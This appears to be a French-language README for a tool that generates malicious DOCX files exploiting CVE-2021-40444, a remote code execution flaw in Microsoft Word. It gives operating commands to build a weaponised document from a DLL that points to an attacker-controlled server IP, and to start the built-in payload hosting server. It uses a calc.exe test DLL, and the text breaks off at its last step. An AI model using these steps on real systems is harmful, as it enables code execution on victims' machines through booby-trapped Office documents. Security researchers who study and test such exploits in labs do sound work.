
Génère des fichiers DOCX malveillants exploitant CVE-2021-40444 pour exécuter du code à distance via des documents Office conçus à cet effet, avec un serveur d'hébergement intégré pour la livraison de la charge utile.
Générateur de documents docx malveillants pour exploiter CVE-2021-40444 (exécution de code à distance dans Microsoft Office Word)
La création de ce script repose sur une ingénierie inverse de l'échantillon utilisé en conditions réelles : 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (fichier docx)
Vous devez d'abord installer lcab (sudo apt-get install lcab)
Consultez REPRODUCE.md pour les étapes de reproduction manuelle
Si votre cab généré ne fonctionne pas, essayez de pointer l'URL d'exploit.html vers calc.cab
Générez d'abord un document docx malveillant à partir d'une DLL ; vous pouvez utiliser celle située dans test/calc.dll qui ouvre simplement calc.exe via un appel à system()
python3 exploit.py generate test/calc.dll http://<SRV IP>

Une fois le docx malveillant généré (il sera dans out/), vous pouvez mettre en place le serveur :
sudo python3 exploit.py host 80

Enfin, essayez le docx dans une machine virtuelle Windows :
